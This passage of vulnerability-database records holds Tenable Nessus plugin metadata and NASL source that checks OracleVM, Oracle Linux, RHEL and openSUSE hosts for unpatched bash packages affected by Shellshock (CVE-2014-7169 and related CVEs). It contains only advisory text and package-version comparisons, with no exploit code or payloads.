"https://www.tenable.com/plugins/nessus/78237", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0021.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78237);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.3 : 
bash (OVMSA-2014-0021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - (CVE-2014-7169) Resolves: #1146322\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000222.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dadbd467\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:29:29", "description": "Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3079.NASL", "href": "https://www.tenable.com/plugins/nessus/77953", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3079.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77953);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3079)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004493.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.3.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3078.NASL", "href": "https://www.tenable.com/plugins/nessus/77894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3078.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77894);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n 
script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3078)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004482.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.2.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:47", "description": "An updated rhev-hypervisor6 package that fixes several security issues is now available.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS. 
(CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product Security Incident Response Team as the original reporters of CVE-2014-1568. The CVE-2014-7186 and CVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package.", "cvss3": {}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1568", "CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1354.NASL", "href": "https://www.tenable.com/plugins/nessus/79053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1354. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79053);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2014-1568\",\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"RHSA\", value:\"2014:1354\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An updated rhev-hypervisor6 package that fixes several security issues\nis now available.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. 
An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation\nOne) input from certain RSA signatures. A remote attacker could use\nthis flaw to forge RSA certificates by providing a specially crafted\nsignature to an application using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting\nCVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product\nSecurity Incident Response Team as the original reporters of\nCVE-2014-1568. 
The CVE-2014-7186 and CVE-2014-7187 issues were\ndiscovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1354\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-1568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rhev-hypervisor6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1354\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.5-20140930.1.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:23:26", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for bsc#898812, CVE-2014-6277: more troubles with functions bash-4.2-parse-exportfunc.patch for bsc#898884, CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches 
bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-595.NASL", "href": "https://www.tenable.com/plugins/nessus/78591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78591);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n 
\"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1310-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Add patches bash-4.2-heredoc-eof-delim.patch for\n bsc#898812, CVE-2014-6277: more troubles with functions\n bash-4.2-parse-exportfunc.patch for bsc#898884,\n CVE-2014-6278: code execution after original 6271 fix\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. 
